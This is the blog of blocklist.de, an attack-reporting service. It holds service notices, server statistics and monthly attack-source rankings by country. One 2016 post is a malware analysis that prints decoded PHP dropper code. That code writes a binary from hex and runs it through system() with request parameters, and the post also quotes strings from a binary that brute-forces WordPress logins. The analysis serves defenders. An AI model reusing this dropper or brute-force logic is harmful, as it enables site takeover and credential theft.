2010
04.23

Der Blog von www.blocklist.de wird hauptsächlich zum archivieren von Statistiken verwendet.

Wenn es mal was interessantes gibt, wird dies hier veröffentlicht. Dazu gehört z.B. neue Angriffe oder Wellen von neue Muster oder wenn eine Art von Angriffen einem Bot-Netz oder einem Wurm zugeordnet werden konnte.

-google-ads-
2021
04.29

In the last Days, we had some mysql-Server issues.

The Server crashs and could only hard restarted.

We do yesterday a lot of analyze the Logfiles and optimize Settings.

We monitored the Server tonight with Debug Options, and it looks at the moment good.

We looking far on it, that he runs stable like before again.

 

Some Queries are now a little bit slower, but we work next on it again to optimize it.

Sorry for the Problems.

-google-ads-
2021
04.21

In the last years/month, it was very quite around blocklist.de

In the last time, we had changed a lot behind the System and drop a lot of Reports/Attacks, which are older then the current two Weeks.

Old stuff is already droped, but not good enough, so we got so much often Problems with the mysql-Server.

At the moment, it looks strange, because the Attacks are droping down from ~24k to 7k, but when we dont make a bug in, it will recover in the next days.

 

And so, yes blocklist.de is still alive 🙂

But it is a lot of work and i dont have enough time, so it is going slowly.

-google-ads-
2019
11.19

In den letzten Tagen, kam es leider zu Bounce-Mails an die Fail2Ban Absender-Adresse mit einer Meldung wie:

<fail2ban@blocklist.de>: Command died with status 255

Dies ist nun gefixt.

 

 

Ebenso ist noch ein anderer Bug offen, wo ich noch dran bin.

Auch bei den Statistiken, aber das ist leider aufgrund der hohen Menge nicht gut zu skalieren und dort stoße ich immer wieder auf Probleme.

 

 

Und ja, das Projekt lebt noch und wird bald auch in Virustotal mit aufgenommen 🙂

Auch in der letzten Zeit, ist der Intervall, wann die Support-Mails abgearbeitet werden, etwas größer geworden, da bin ich schon dran. Alle Mails, welche aber zu alt sind, werden als „resolved“ markiert und somit ein Schnitt gemacht.

-google-ads-
2016
05.03

A half year ago, since the first News comes up, that the Updates for the Debian-LTS from Update is near EndOfLife, we have tried to upgrade the blocklist.de-Systems.
But it was to hard 🙁

Because there was a lot of Changes, which need to manually fixed.

We have copied the Data to a vps and worked with them. So we update the System -> crash… Rockbackup, fixed the Error, Update -> crash…. and again and again…….

After round about 6 Months later, we had fixed all Errors and run now all Systems with the latest Version of the OS.

After the first stable Updates, there was a some Bugs, we dont see, but the BlockList.de-User has informed and helped us, to fix this.

So, now the Blocklist.de-Site is almost as soon as the previous System (with a little bit more Caching).

 

Only the Munin-Pictures are broken at the moment, because there was too many Users for the Munin-System. But we work on it and for the most Graphs, the creating works again fine.

The Website has an A+-Raking at ssllabs now:

blocklist.de-ssllabs

https://www.ssllabs.com/ssltest/analyze.html?d=blocklist.de&s=185.21.103.31

 

blocklist.de-ssltools

https://de.ssl-tools.net/webservers/www.blocklist.de

 

 

And also the Mailsystem:

MX Server Pref Con-
nect
All-
owed
Can
Use
TLS
Adv
Cert
OK
TLS
Neg
Sndr
OK
Rcvr
OK
smtp-mx.blocklist.de
[93.180.154.80]
10 OK
(134ms)
OK
(135ms)
OK
(136ms)
OK
(137ms)
OK
(442ms)
OK
(136ms)
OK
(136ms)
FAIL *
smtp-mx2.blocklist.de
[46.252.26.16]
20 OK
(181ms)
OK
(182ms)
OK
(180ms)
OK
(180ms)
OK
(467ms)
OK
(183ms)
OK
(187ms)
FAIL *
webserver3.blocklist.de
[185.21.103.31]
70 OK
(140ms)
OK
(8,253ms)
OK
(131ms)
OK
(131ms)
OK
(443ms)
OK
(132ms)
OK
(141ms)
FAIL *
smtp-mx.blocklist.de
[93.180.154.80]
80 OK
(137ms)
OK
(136ms)
OK
(133ms)
OK
(133ms)
OK
(373ms)
OK
(134ms)
OK
(136ms)
OK
(251ms)

* = greylisting for the tested Address is active.

 

blocklist.de-ssltools-mx

https://de.ssl-tools.net/mailservers/smtp-mx.blocklist.de

What we have already build:

  • Info-Mail about Servers, which has send Reports without Logfiles
  • Info-Mail about Servers, which has send longer then 90 Days no Reports
  • Info-Mail about disabled Servers in your Profile (disabled due false-positives…..)

 

The next Step are:

  • to make the HTML and CSS ready for mobile devices.
  • a writeable API to add Servers or change settings
  • The Munin-Graphs zoom able
  • Live Attack Map like http://map.honeynet.org/ (currently offline) or http://www.sicherheitstacho.eu/
  • php7 for the Site/Api/Scripts
  • API complete as an REST-full api
  • Rsync Access for the rbl-Data
  • Upgrade the Abuse-Reports to the new (higher) dkim-key
  • Update the language Files (with google-translate) for french, chinese and more, that blocklist is available in more languages (and the Login-Sites too)
  • Generate the Statistics from the Blog (The raking from the countries and Companies) automatically.
-google-ads-
2016
01.03

In the last Days, we see a lot of hacked WordPress/Joomla-Sites, which makes outgoing BruteForce-Login Attacks to other WordPress-Sites.

The Attackers create some Files with the name libso48.php, libso47.php, libso46.php and call them over GET-Requests with Parameter id:

domain.tld/directory/xxx/xxx/libso48.php?id=ksej4kWxddukqL2iTZeD&a=MwUvLBQjEzhYUx4IJnc/WyQC

The using UserAgent is with the String „–user-agent“:

" --user-agent=Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:39.0) Gecko/20100101 Firefox/39.0"

 

The bad files check if the Server runs at x32 or x64 and compile a file libworker.so

The libworker.so File makes the attacks.

 

Code from the libso48.php (decoded):

<?php
header("Content-type: text/plain");
if (!function_exists('file_put_contents')) {
    function file_put_contents($filename, $data) {
        $f = @fopen($filename, 'w');
        if (!$f) return false;
        $bytes = fwrite($f, $data);
        fclose($f);
        return $bytes;
    }
}
//@system("killall -9 ".basename("libworker.so"));
$so32 = Hex-Code;
$so64 = Hex-Code;
//hexcode decoded start
............
fork
INFO Started brute forcing.

path=/wp-content/pluginsINFO SUCCESS: %s
<!DOCTYPE html<ERROR> (%s:%d: errno: %s) 
can not determine logged in or not.
INFO exit status: %d
........
<ERROR> (%s:%d: errno: %s) 
Error.
<INFO> (%s:%d: errno: %s) 
Started xml rpc brute force
.........
//hexcode decoded end
 
$arch = 64;
if (intval("9223372036854775807") == 2147483647)
    $arch = 32;
print "Arch is ".$arch."
";
$so = $arch == 32 ? $so32 : $so64;
$f = fopen("/usr/bin/host", "rb");
if ($f) {
    $n = unpack("C*", fread($f, 8));
    $so[7] = sprintf("%c", $n[8]);
    print "System is ".($n[8] == 9 ? "FreeBSD" : "Linux")."
";
    fclose($f);
}
print "SO dumped ".file_put_contents("./libworker", $so)."
";
@chmod("libworker", 0777);
//@system("./libworker " . $_GET['id'] . " > /dev/null 2> /dev/null &");
@system("./libworker " . $_GET['id'] . " " . $_GET['a'] . " > out 2> err &");
exit(0);
?>

The complete Script is decoded under unphp.net (but with the decoded hex code):
http://www.unphp.net/decode/9f6f7e9085045418857e6b54e07b20e9/

On the Hexcode, which was written in the libworker.so file had the following code inside:

......

%s
}{
  "type" : "WPBF_RESPONSE",
  "success" : false,
  "site" : "%s",
  "user" : "%s"
}
Sending: %s
{
  "type" : "WPBF_RESPONSE",
  "success" : true,
  "site" : "%s",
  "user" : "%s",
  "pass" : "%s"
}
{}curlhttp://https://%swp-login.php%s/wp-login.phphttp://%swp-login.phphttp://%s/wp-login.phplog=%s&pwd=%s&wp-submit=Log+In&redirect_to=http%%3A%%2F%%2F%s%%2Fwp-admin%%2F&testcookie=1log=%s&pwd=%s&wp-submit=Log+In&redirect_to=https%%3A%%2F%%2F%s%%2Fwp-admin%%2F&testcookie=1--user-agent=Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:39.0) Gecko/20100101 Firefox/39.0--dataCookie:wordpress_test_cookie=WP+Cookie+check-HContent-Type:application/x-www-form-urlencodedCache-Control:max-age=0Accept-Language:en-US;Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8-A-iINFO checking: %s, %s, %s
Success./src/wpbf/bf.c<ERROR> (%s:%d: errno: %s) 

You can see always, the Attacker use curl and Makes xmlrpc-BruteForce and normal wp-login.php WordPressBruteForce-Logins.

If you found the libso48.php or libworker.so File in your Webspace, please check, clean and update your software and stop running processes from libworker file.

-google-ads-
2015
03.06

The Traffic, Load, Users and other Statistics of blocklist.de for the Month 02.2015

 

Currently, blocklist.de has the following Stats/User:

User: 2,144

Server: 2,325

Attacks: 246,084,421 since 01.01.2014

Reports: 10,092,816 since 2012

Daily Mails: ~690,500 (lower limit) ~1,450,000 (high limit)

Web-Traffic: ~309 GB

RBL-/API-Traffic: ~85 GB

Mail (In/Out)-Traffic: ~~3,528 GB

Traffic over IPv6 (Mail, Web..): ~5GB

To this data, there comes 6,4TB Traffic between the Web-/Mail-Server and the MySQL-Server. The MySQL-Server sends over ~8,5 GB each Hour out.

The Mysql-Server use now 62% from 32GB Ram (~14gb Cache). And the System-Load is in average on 1.10 .

The WebServer is using not full of 12GB Ram and the System-Load is under 0,7. The open Connections are ~25,000 on the same time

 

The complete Traffic from all Systems are round about 6,6TB in 02/2015 (the Traffic from MySQL-Server over the not public IPs is not included).

-google-ads-
2015
03.06

Statistics for 10/2014.

 

The Image (Up, down, same….) is the different from 10/2014 (last statistics):

 

Die Pfeile ist die Position zum Vormonat (gestiegen, gefallen, gleich geblieben).

Nach IP-Adressen sortiert (unique):

  1. 30324 CN
  2. 10486 RU
  3. 9775 US
  4. 9012 NoName
  5. 8925 TW
  6. 7083 UA
  7. 4876 VE
  8. 6421 VN
  9. 4980 IN
  10. 4824 AT

Sortiert nach Anzahl der Angriffe:

  1. 9278162 CN
  2. 4358200 PL
  3. 3860007 UA
  4. 2058265 NoName
  5. 596001 FR
  6. 430084 US
  7. 248110 RU
  8. 48762 DE
  9. 34456 NoASN
  10. 29661 SE
-google-ads-
2015
03.06

After 2 Years, we try to regenerate the Statistics over the countries from month to month again.

 

The Image (Up, down, same….) is the different from 09/2014 (last statistics):

 

Die Pfeile ist die Position zum Vormonat (gestiegen, gefallen, gleich geblieben).

Nach IP-Adressen sortiert (unique):

  1. 28650 CN
  2. 19957 VN
  3. 13776 RU
  4. 9309 US
  5. 7571 IN
  6. 6262 NoName
  7. 4876 VE
  8. 4743 UA
  9. 4633 TW
  10. 4054 BR

Sortiert nach Anzahl der Angriffe:

  1. 8164637 CN
  2. 4269205 PL
  3. 2593427 UA
  4. 1841862 US
  5. 906412 FR
  6. 715298 NoName
  7. 186913 RU
  8. 41671 VN
  9. 27603 NoASN
  10. 20123 IQ
-google-ads-
2014
10.10

The Traffic, Load, Users and other Statistics of blocklist.de for the Month 09.2014

 

Currently, blocklist.de has the following Stats/User:

User: 1,719

Server: 1,932

Attacks: 282,138,414   since 05.05.2013

Reports: 8,572,275 since 2012

Daily Mails: ~750,400 (lower limit) ~1,250,000 (high limit)

Web-Traffic: ~290 GB

RBL-/API-Traffic: ~80 GB

Mail (In/Out)-Traffic: ~~3,315 GB

Traffic over IPv6 (Mail, Web..): ~5GB

To this data, there comes 6,1TB Traffic between the Web-/Mail-Server and the MySQL-Server. The MySQL-Server sends over ~8,4 GB each Hour out.

The Mysql-Server use now 60% from 32GB Ram (~14gb Cache). And the System-Load is in average on 2.40 .

The WebServer is using not full of 12GB Ram and the System-Load is under 0,6. The open Connections are ~23,000 on the same time

 

The complete Traffic from all Systems are round about 6,4TB in 09/2014 (the Traffic from MySQL-Server over the not public IPs is not included).

-google-ads-
2014
10.09

After 2 Years, we try to regenerate the Statistics over the countries from month to month again.

 

The Image (Up, down, same….) is the different from 2012 (last statistics):

 

Die Pfeile ist die Position zum Vormonat (gestiegen, gefallen, gleich geblieben).

Nach IP-Adressen sortiert (unique):

  1. 29182 CN
  2. 12068 VN
  3. 10280 IN
  4. 8157 US
  5. 7082 RU
  6. 14573 VN
  7. 5651 NoName
  8. 5216 VE
  9. 4054 BR
  10. 3986 UA

Sortiert nach Anzahl der Angriffe:

  1. 7805582 CN
  2. 6300587 US
  3. 1752518 US
  4. 1533083 PL
  5. 678569 NoName
  6. 537431 FR
  7. 175161 RU
  8. 35833 AT
  9. 35048 DE
  10. 32085 NoASN
-google-ads-